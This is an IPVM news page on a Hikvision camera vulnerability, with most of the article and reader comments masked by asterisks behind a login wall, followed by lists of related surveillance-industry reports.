** ***** ** *********, the ******* ** ** many ****** ** **** industry ****** ************* **********. The ***** '*** ****** could **** ** ***** so *** *****!'

*** **** ** **** live **** ** ** show ****** **** ***** and *** **** ****** care ***** *************.

*** ******** ** ****** the ****** ** ******** is **** ***** ***. Many ************* **** ** keep ***** *** ***** to ***** ***** ** require ** ***. *** the **** *** *** there *** ***********.

** ** ***'* **** it, ****** **** **** it *** ***** *****. Some ************* ******** **** their ***.

********* **** ********** *** a ***** *****, ** was *** ** **** forward * ****** *** remote *******, ***********, ***. End ** *****. *** end **** *** *** use ** **** *** anymore, *** ***** ***. Or **** *** ** app ** **** *** camera *** ** **** works.

*** ******** ***** ** be ** *** ******.

****** *** **** **** thru *** ****** ***** network **** ********* **** or ** *** ********** it ** *** ******** is ******* * * key **** ** ******** by ****** *** ******* in ***** **********.

*** *** ********** ** iran **** ********* ** connected ** *** ********? Even *** ****** ******* need **** ***** ********.

*** *** ********** ** iran **** ********* ** connected ** *** ********? Even *** ****** ******* need **** ***** ********.

**** ** ** ********* example ** *** *** cannot **** ** ******** device ****** ****** ** network ************ *****. *** can ******** *** ****, but *** ********* **.

**** ******-** ** **** '************' **** *** ********* *** *** other ***...

*** ** **** ******* directed **?

* **** ****** ** comment ** *** ******** part.
****** *** ******* ** your *** *** *** published ** *** ******** does ***
**** ******* ***'* *** in. ** ** ******** the ******* ******, ** is *********
***** ****** ** **** cost ********* ******. ***** tend ** ** ***** stores ***
***** ***** ***********. **** of ***** ********* ***** free **** ** ***** customers.
*************, ******** ** ***** people **** **** *** router (***/**** ********)
***** ****** *** ******, Cameras *** ********* ****. Hopefully **** ****
******* *** ******* ******** on *** ******. *** it ** ********* **** for * ******
** *** *****, *** the **** ******* *** monitor *** ******* *********** cash ************.

* ***** **** ** further ** ******** *** that **'* **** **** to ******** * ***** recording
****** ***** * ********* Pi, **** ** ** to *** ******** *** have ** ****** *** closing
********* ** *** ********. Now *** ****** *** sufficient *********** ** *** the *****.
********, * **** **** many ****** ***** *** camera ******** ******* *** code ** ***
**** *** **** ***** to ***** ** ****** overnight.

******, ** *** **** exploits *** *******!!!
***** ** ****** * way **, **'* **** a ****** ** *** difficult *** **** ** for *** *******.
**** ******* **** *** in, ****** ********** ****, effort, ****** (*** ****** engineering). *** **** *******, all ****** ******* ** the *****, ******* **** knowledge, **** **** * field ***.

*** *** *** ********* on ********* **** *** already ******** **? **** exploit *** **** *******. Common ***** ***** ** people ****** ** ********* the ******** **** ***** this.

**** **** ** *** show ** ** ******* in *** ******* ********.

*** ******** ******** ******* the **** **** ***** was * *************, *** the ******* *** *** been ******** *********. ***** this ******* * ****** of **** *** ********* users, ***** *** ** least *** ******* **** specifics **** *** ******** known.

***, *** ********** ****** the ******* *** ******** full *******, ***** *** significantly ********* *** **** to ********* ****** ******. This ** *** ** released *** *** ****** (and *** ********* ****** have *********** ******** *********).

***, *** ******** *** patched **** *******, ******* our ***** **** ******** of ********* ** ******* with ****** ************* *** still **********. ******* ******* likely **** ** ***** be *******, ** **** are ********** ** ****** attacks ** *** ******** connected ** *** ********.

**** **** ** *** show ** ** ******* in *** ******* ********.

***** *********'* ***** ****** of *************** *** ********, it *** ** **** a ****** ** **** before **** ** ****. I **** *** ** not ***** **** *** current ******** ** ******* the *** **** *** removed *** ********, *********, and ***** **** **** compromise *** ******** ** Hikvision *******, ** **** would ** **** ********.

** **'* ********** ************** to **** **** ********* are ********* ***** ********? If *** *** **, patching * ******** ** a **** ***** ******.

**, ** ** ***** responsibility ** **** **** their ******** **** *** have ****** *********** ********* in *** ***** *****.

******** ******** ** * good ***** ****** ** you *** ****** ******* bugs, ****-**** *********, *** enhancing *************. ******** ******** to ***** ***** ********* is **** ****** * bank ****** *** * good ***** ****** ** returning ***** ** *** occasions ** ** ******.

******* ****** **** **** is ********* ** **** people *** ****** "******** recovery *********" *** ******* them ** *** ********. Thus, **** ******* ** out ***** *** *****. It ** ********* *** a *** ****** *** end **** ** **** about **** *** ******* against **. **********, ** was * ************* ** theory, *** *** ***** exploit **, *** *** had ** **** ***'* word ** ** ** to **** ** ***, how *** ** ***, etc.

*** ***** ** ***** that ** ***'* **** a "********* **********" ** they ***** ** **** it, ** ********* ******* pages, ***. ** ** a **** ****.

** ****** *** ***'*/***'* update *** ******** ** installed *******, *** **** could **** *********, *** force ***** ** ****** firmware. **** *** ****** their *****, *** *** stand ****** ***** ***** partners (***** ***/*** ******* & *****), *** **** clearly ****** ****** (***** off) ** **** *** service.

**** ** **** * basic *******. ** ********* modification ** **** ** cookies, ***. **** ** even ***** **** *** Sony ******** ******** ***** from **** ****.

****** **** ****** **** shut **** *** **** and ***** **** ***** is/is ** ********, ***. Any ******* **** **** than * *** *********** and *** *** *** fresh *** ** ****** would ***** ***** **** in. ***** *** ** many ***** *********** **** to **** ****. ** they ***** ***** ********, they ***** **** ***** care ** **** ** their *** *** ****** it **** ** * "security ***********" *** ** it **** **** *** in *** ******** **** brush ** *** ** a *********** ***** **** was ***** **** **.

*******, ********** **** ** find **** ** ***** own *** ******* ** to **** *********** ** expose ** ** ***** them ** *** **.

** *** *** **** market *****, ** ** still ***** **************. **** if *** ******** *** designed *** *** ******* market, ** ***** ** be *****. ** ** still * ****** ************ by ****, ** ***** their ********. *** ** story.

********* *** ***** **** to ***** ******** ******** they ***** ***** *** Apple/Android/Windows ****** ***** *** push ******* ** ******* devices. ******* ** ****'* work ** **** * couple ** ***** **** with **** ****** *** other ******* ********** ****** app ****** ******** ******* accidentally. ** **** ***** past ****** **.

*** ******* ***** ** ***'* ********* *** ******** ***? ** this *******, **** ***** ******* ******** *** ****** ** ********** devices ***** ***** ******. *** *** ******* ******** *** ****** in *** ******* ********* *****?

***, **** ***** * section ********** ************* ** OEM *******:

OEMs **********

**** ******** *** **** found ** *** *******, we ****** *** ********* cameras *** ***** **** vulnerable:

  • *** *********-*** ** ******** V5.4.0build ******
  • ***** **** ****** - 0E-21BF40 -****** ** ******** V5.3.0build ******

***** ********* *** ******* are ****** ********** ** well, *********** ********** *** number ** ********** ******* online *************.

****** *****, ** ***** be **** *********** ** you ***** ****** *** numbers ** ********** ******* found ** ****** ********* OEMs ** *** *** full *********/****** ** **** exploit. *** * ***** understand ** **** ** too **** **** ☺️

*'** **** ******* *** ** ***** *** ** ****. **** risks *** ***** ** **?

** ******** ***** *** *** ****** ********* ***. *** ** my *****, **** **** ***** * ******** ** ******* **** me *** ** ** ****** ** *** ** ** ********?

**** *** ****** ** on *** **** *** as *** ******* **** PCs **** ******* ****** passwords, ****** *****, *** return ****, ****** ******** numbers, ***.?

********* ***** *** *** cameras **** *** ********, the **** ** ************************* ** ****.

**** ********* *************** ***** exist **** ********** **** be ********** *** ********* is ********** ** *****. It ***** **** ** trust ** *** ********.

* ******* ** ******. **** ** **** ****, ***** ***.

** **** ****** **. **** ***** ** *** ** **/**** SV:V5.4.5_170124

****----- ***** ****** **** *** ******* *** ******* *** ****, this ****** ****** ** ****.

******** *** ****** ** the ****** ******** (********* it's ***** *** *** model) ** *** ***** step, *** *** ****** probably ** ***** ***** that **** ****** *****'* have **** ******* ****** you ******* *** ******. That ****** ******* ** least *** ****** ** its ******** ** ********, even ** *** ******* and ******* ******* **** turned *** **** *** camera ** *******. ** you **** ****** ****** to *** ******, *** a *** *** *******.

********* *********, **'* ***** situational. ******* *** *** access ** *** ****** somehow ******** **** **** to **** **** ***'** not ****, *** ** the ****** ** ** your ***** ******* **** all *** ***** ****, it ***** ** *****. If ** **** ***** the ****** ******* ********** to *** ********, **'* only * ****** ** time ****** ******* ****** your **** *** ******* it, ******* **** ** prank *** ** *** on **** ******** **** just *** ***** ** not ******.

** *** ****** ** not ********** *** ******** and ****** ****** *** internet, **'* ****** *** house *** ***'** ********* your ***** ******* ***'* have ***** ******* ** such ******, **'* ******** fairly **** ** *** it. **'* *** **** where ******* ******* **** house *** **** ** that ***** ** * risk **** ***** ***** of ***** *********.

...

****** -

** ******** *** ********* video, ******* **** *** simple ** ** ** utilize **** ******* ** retrieve ** ***** ******** and ****** *********** **** a ******. ** **** show *** ******** ***** tool ** ***:

*****,

**** ** ***** "********" ***** **** *.*.* ********

**** ** ********, ** it *** ***** ** version *.*.* (******** ** March ****) *** **** models.

**** *********'* "*********-********** ************* Notice":

********* ******** ** **** and ** ************* ************ *** **** ****:

** == **** ********??!

** == **** ********??!

***, ***** *** *** clarifying ****.

**, ** **** *******, is "******* **, ********* ** Hikvision *** ***. *** Hikvision ****** ***"

******, ******.

*** ******* ** ***** overly ********* ***** *******. * **** ***** read *** ******** ** "promoting ********* ******** ***** China *** *** ******* people."

* ******* ** ** correct ** "*****" = Chinese ********** *** "******* people" = ********* *********.

*** **** ********* ******** to ****** *** *******? They ****** ***** ** continuous ************** *** ******* improvement.

****** **** ******* ** reminding ***** **** ************* is * ******* *** everyone ******* ** ****** a ***** *** **** at ***** (*** ** Headquartered ****** *** ******) he *** ***** ** a ************ ******, *** spoke ***** *** **** threats. ** ***** ** difference ***** ************ *** prefer ******** ** ***** to **** ** ************* because ** ** ** ongoing ****** ** *** equipment.

** ***** ***** *** finger ** ** *****, but ******** **** *** point *** ****** ** me *** *** ******** three ** ********!

****** **** ******* ** reminding ***** **** ************* is * ******* *** everyone

***** ****** ** ** make ************* * ***-***** by ******* **** ******** has *** **** ***** security ********. *** *********'* track ****** ** *** last **** (**** * magic ****** ********, * compromised ****** *******, ******** passwords ** ***** ****, cracked ******** *****, ***.) show *********.

* *** ********* ********** the ***** ***** ****** to ** **** *** the ********** ******* ** factually *****.

“***** ***** **** * ****, ********* *** *** ** **** to **** *** **********.”
― **** *****

**, *** ****** **** are *****?

****, * ****’* ** ** *** * ** **** ** funny!

Login to read this IPVM report.
Why do I need to log in?
IPVM conducts unique testing and research funded by member's payments enabling us to offer the most independent, accurate and in-depth information.

Related Reports

Sighthound Transforms Into Enterprise AI Provider on Jun 14, 2019
Sighthound is now rapidly expanding its R&D team, building an enterprise AI service. This may come as a surprise given their origins 6 years...
Camera Course Summer 2019 - Register Now on Jun 12, 2019
Register for the Summer 2019 Camera Course.  This is the only independent surveillance camera course, based on in-depth product and technology...
OSDP Access Control Guide on Jun 04, 2019
Access control readers and controllers need to communicate. While Wiegand has been the de facto standard for decades, OSDP aims to solve major...
IndigoVision Control Center VMS Tested on May 30, 2019
IPVM's last test of IndigoVision's VMS was in 2010, which found enterprise VMS features and a simple client interface. but no 3rd party camera...
Verkada Favorability Results 2019 on May 29, 2019
Verkada has taken the industry by storm with the fastest growing video surveillance sales organization ever and a half billion dollar valuation....
LifeSafety Power NetLink Vulnerabilities And Problematic Response on May 20, 2019
'Power supplies' are not devices that many think about when considering vulnerabilities but as more and more devices go 'online', the risks for...
Ranking Manufacturer Favorability 2019 on May 06, 2019
24 manufacturer's favorability was ranked based on 170+ integrators feedback. Voting plus in-depth comments revealed insights on which brands were...
Register Now - Fall 2019 IP Networking Course on May 02, 2019
Register for the Fall 2019 IP Networking Course. For early registration save $50 off the course's normal $299 price. This is the only networking...
Verkada Cloud VMS/Cameras Tested on May 02, 2019
Verkada is arguably the most ambitious video surveillance startup in many years. The company is developing their own cameras, their own VMS, their...
Camera Configuration Manager Shootout - Avigilon, Axis, Bosch, Dahua, Hanwha, Hikvision on May 01, 2019
Which camera manufacturer has the best management tool? We tested 6 manufacturers - Avigilon, Axis, Bosch, Dahua, Hanwha, Hikvision to find...

Most Recent Industry Reports

Sighthound Transforms Into Enterprise AI Provider on Jun 14, 2019
Sighthound is now rapidly expanding its R&D team, building an enterprise AI service. This may come as a surprise given their origins 6 years...
ADT Eliminating Acquired Brands, Unifying Under 'Commercial' Brand on Jun 14, 2019
ADT is eliminating the brands of the many integrators it has acquired over the past few years, including Red Hawk, Aronson Security Group (ASG),...
NSA Director Keynoting Dahua and Hikvision Sponsored Cybersecurity Conference on Jun 13, 2019
The technical director for the NSA’s Cybersecurity Threat Operations Center will be keynoting a physical security cybersecurity conference that is...
Farpointe Data Conekt Mobile Access Reader Tested on Jun 13, 2019
California based Farpointe Data has been a significant OEM supplier of conventional access readers for years to companies including DMP, RS2, DSX,...
Embattled $400 Million China Funded Philippines Surveillance System Proceeds on Jun 13, 2019
An embattled 12,000 camera surveillance system project that will cost ~$400 million will proceed.  The project contract was awarded, had its...
False Verkada 'Unrivaled' Low Light Performance Claim Removed on Jun 12, 2019
Verkada falsely claimed that it delivered 'UNRIVALED LOW LIGHT PERFORMANCE' until IPVM questioned. In fact, Verkada's low light performance is...
Manufacturer Favorability Guide 2019 on Jun 12, 2019
The 259 page PDF guide may be downloaded inside by all IPVM members. It includes our manufacturer favorability rankings and individual...
Camera Course Summer 2019 - Register Now on Jun 12, 2019
Register for the Summer 2019 Camera Course.  This is the only independent surveillance camera course, based on in-depth product and technology...
Favorite Wireless Manufacturers 2019 on Jun 12, 2019
Many wireless options exist for video surveillance but how are integrator's overall favorites? 170 integrators answered the question: What is...
Carnegie Mellon AI Startup Zensors Profile on Jun 11, 2019
Zensors is a startup formed by Carnegie Mellon graduates from a Carnegie Mellon research project, offering customized models per camera that they...

The world's leading video surveillance information source, IPVM provides the best reporting, testing and training for 10,000+ members globally. Dedicated to independent and objective information, we uniquely refuse any and all advertisements, sponsorship and consulting from manufacturers.

About | FAQ | Contact